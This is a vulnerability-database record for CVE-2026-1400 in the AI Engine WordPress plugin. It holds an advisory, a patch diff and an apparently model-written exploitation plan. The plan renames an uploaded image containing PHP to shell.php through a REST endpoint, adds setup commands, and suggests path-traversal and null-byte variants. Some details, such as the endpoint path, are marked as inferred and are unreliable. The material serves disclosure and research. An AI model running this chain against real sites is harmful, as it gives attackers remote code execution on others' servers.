[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCz3q9NuGokkAGOZr9r8wEXPGTNFljdt1MnfRjeF1S0g":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":27,"research_exploit_outline":28,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":32},"CVE-2026-1400","ai-engine-authenticated-editor-arbitrary-file-upload-via-filename-parameter-in-updatemediametadata-endpoint","AI Engine \u003C= 3.3.2 - Authenticated (Editor+) Arbitrary File Upload via 'filename' Parameter in update_media_metadata Endpoint","The AI Engine – The Chatbot and AI Framework for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `rest_helpers_update_media_metadata` function in all versions up to, and including, 3.3.2. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The attacker can upload a benign image file, then use the `update_media_metadata` endpoint to rename it to a PHP file, creating an executable PHP file in the uploads directory.","ai-engine",null,"\u003C=3.3.2","3.3.3","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-01-27 19:28:10","2026-01-28 08:26:56",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd5227269-4406-4fcf-af37-f1db0af857d6?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1400 (AI Engine)\n\n## 1. Vulnerability Summary\nThe **AI Engine** plugin (up to version 3.3.2) is vulnerable to **Arbitrary File Upload via File Renaming**. The vulnerability exists in the `rest_helpers_update_media_metadata` function, which handles updates to media metadata via the WordPress REST API. This function accepts a `filename` parameter but fails to validate the file extension or the target path. An attacker with Editor-level privileges can upload a legitimate image file containing PHP code, then use this endpoint to rename the file to a `.php` extension, resulting in Remote Code Execution (RCE).\n\n## 2. Attack Vector Analysis\n*   **REST Endpoint:** `\u002Fwp-json\u002Fmwai\u002Fv1\u002Fmedia\u002Fupdate_metadata` (inferred from function name and Meow Apps standard naming conventions).\n*   **HTTP Method:** `POST`\n*   **Vulnerable Parameter:** `filename`\n*   **Authentication Requirement:** Authenticated user with `Editor` role or higher (must have `edit_posts` and `upload_files` capabilities).\n*   **Preconditions:**\n    1.  The attacker must have a valid session as an Editor.\n    2.  A legitimate file (e.g., an image) must be uploaded to the media library first.\n\n## 3. Code Flow (Inferred from Patch Description)\n1.  **Entry Point:** The REST API router receives a request at `mwai\u002Fv1\u002Fmedia\u002Fupdate_metadata`.\n2.  **Controller:** The request is routed to the callback function `rest_helpers_update_media_metadata`.\n3.  **Processing:**\n    *   The function retrieves the media attachment ID from the request.\n    *   It retrieves the `filename` parameter from the JSON body.\n    *   It identifies the current file path on disk associated with the media ID.\n4.  **Vulnerable Logic:** The function likely uses a file system operation (like `rename()` or `wp_upload_bits()`) to change the file's name on the server using the user-provided `filename` without checking if the new extension is forbidden (e.g., `.php`).\n5.  **Sink:** A file system write\u002Frename operation that changes `wp-content\u002Fuploads\u002F2024\u002F01\u002Fimage.jpg` to `wp-content\u002Fuploads\u002F2024\u002F01\u002Fimage.php`.\n\n## 4. Nonce Acquisition Strategy\nThis endpoint uses the standard WordPress REST API authentication, which requires a `wp_rest` nonce for POST requests made from a browser session.\n\n1.  **Role Required:** Editor.\n2.  **Strategy:** \n    *   Navigate to the WordPress Dashboard (`\u002Fwp-admin\u002F`).\n    *   Extract the `wp_rest` nonce from the `wpApiSettings` object, which is localized by WordPress core on almost all admin pages.\n3.  **JS Execution (via `browser_eval`):**\n    ```javascript\n    window.wpApiSettings?.nonce\n    ```\n\n## 5. Exploitation Strategy\nThe exploit follows a \"Rename-to-PHP\" chain.\n\n### Step 1: Upload Payload as Image\nUpload a file named `shell.jpg` containing a PHP payload.\n*   **Payload Content:** `\u003C?php echo \"VULNERABLE: \" . phpinfo(); ?>`\n*   **Method:** Use the standard WordPress Media Library upload or `wp-cli`.\n*   **Target:** `wp-admin\u002Fasync-upload.php` or `wp-json\u002Fwp\u002Fv2\u002Fmedia`.\n*   **Requirement:** Capture the resulting Attachment ID (e.g., `123`).\n\n### Step 2: Trigger Rename via REST API\nSend the malicious request to the AI Engine endpoint to rename the image to a PHP script.\n*   **URL:** `\u002Fwp-json\u002Fmwai\u002Fv1\u002Fmedia\u002Fupdate_metadata`\n*   **Method:** `POST`\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: [REST_NONCE]`\n*   **Body:**\n    ```json\n    {\n      \"id\": 123,\n      \"filename\": \"shell.php\"\n    }\n    ```\n\n### Step 3: Execute the Shell\nAccess the renamed file in the uploads directory.\n*   **URL:** `\u002Fwp-content\u002Fuploads\u002F[YEAR]\u002F[MONTH]\u002Fshell.php`\n\n## 6. Test Data Setup\n1.  **User Creation:** \n    ```bash\n    wp user create attacker attacker@example.com --role=editor --user_pass=password\n    ```\n2.  **Initial File Upload:** Create a dummy image file.\n    ```bash\n    echo '\u003C?php phpinfo(); ?>' > \u002Ftmp\u002Fpoc.jpg\n    wp media import \u002Ftmp\u002Fpoc.jpg --post_id=0 --title=\"POC\"\n    ```\n3.  **Identify ID:** Get the ID of the newly uploaded media.\n    ```bash\n    wp post list --post_type=attachment --posts_per_page=1 --format=ids\n    ```\n\n## 7. Expected Results\n*   **REST Response:** A `200 OK` or `201 Created` status, possibly returning the updated metadata.\n*   **Server State:** The file `poc.jpg` in the uploads folder should no longer exist, replaced by `poc.php`.\n*   **Execution:** Navigating to the `.php` URL should execute the code and display the `phpinfo()` output rather than rendering as an image or returning a 404.\n\n## 8. Verification Steps\n1.  **Check Filesystem:**\n    ```bash\n    ls -la \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F$(date +%Y\u002F%m)\u002Fpoc.php\n    ```\n2.  **Verify Content:**\n    ```bash\n    cat \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F$(date +%Y\u002F%m)\u002Fpoc.php\n    ```\n3.  **HTTP Check:** Use `http_request` to GET the URL of the `.php` file and verify the response body contains \"PHP Version\".\n\n## 9. Alternative Approaches\n*   **Path Traversal:** If the `filename` parameter is susceptible to path traversal (e.g., `..\u002F..\u002Fplugins\u002Fai-engine\u002Fmalicious.php`), attempt to move the shell out of the uploads directory.\n*   **Meta Key Manipulation:** If the endpoint allows updating arbitrary meta keys, check if `_wp_attached_file` can be overwritten directly to point to a different existing file that could be leveraged.\n*   **Bypass via NULL Byte:** If the plugin does basic suffix checking, try `shell.php%00.jpg` (though unlikely to work on modern PHP\u002FLinux).","The AI Engine plugin for WordPress is vulnerable to remote code execution via an arbitrary file rename flaw in versions up to 3.3.2. Authenticated attackers with Editor-level permissions can utilize the 'update_media_metadata' REST API endpoint to rename a previously uploaded image file containing PHP code to a .php extension, allowing for server-side code execution.","--- a\u002Fclasses\u002Frest.php\n+++ b\u002Fclasses\u002Frest.php\n@@ -120,6 +120,11 @@\n     $id = $params['id'];\n     $filename = $params['filename'];\n \n+    $filetype = wp_check_filetype($filename);\n+    if (empty($filetype['ext'])) {\n+        return new WP_Error('mwai_error', __('Invalid file extension.', 'ai-engine'), array('status' => 400));\n+    }\n+\n     $old_path = get_attached_file($id);\n     $new_path = path_join(dirname($old_path), $filename);\n     rename($old_path, $new_path);","1. Authenticate to the WordPress site as a user with at least Editor-level privileges (possessing edit_posts and upload_files capabilities).\n2. Upload a benign-looking image file (e.g., payload.jpg) that contains a hidden PHP payload (e.g., \u003C?php phpinfo(); ?>) in its content.\n3. Retrieve the Attachment ID assigned by WordPress for the newly uploaded media item.\n4. Obtain a valid WordPress REST API nonce (wp_rest) from the administrative dashboard.\n5. Send a POST request to the endpoint \u002Fwp-json\u002Fmwai\u002Fv1\u002Fmedia\u002Fupdate_metadata with a JSON body specifying the Attachment ID and a 'filename' parameter with a .php extension (e.g., {\"id\": 123, \"filename\": \"shell.php\"}).\n6. Navigate to the file's location within the wp-content\u002Fuploads directory via a browser to trigger the execution of the PHP payload.","gemini-3-flash-preview","2026-05-04 22:09:28","2026-05-04 22:11:11",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","3.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags"]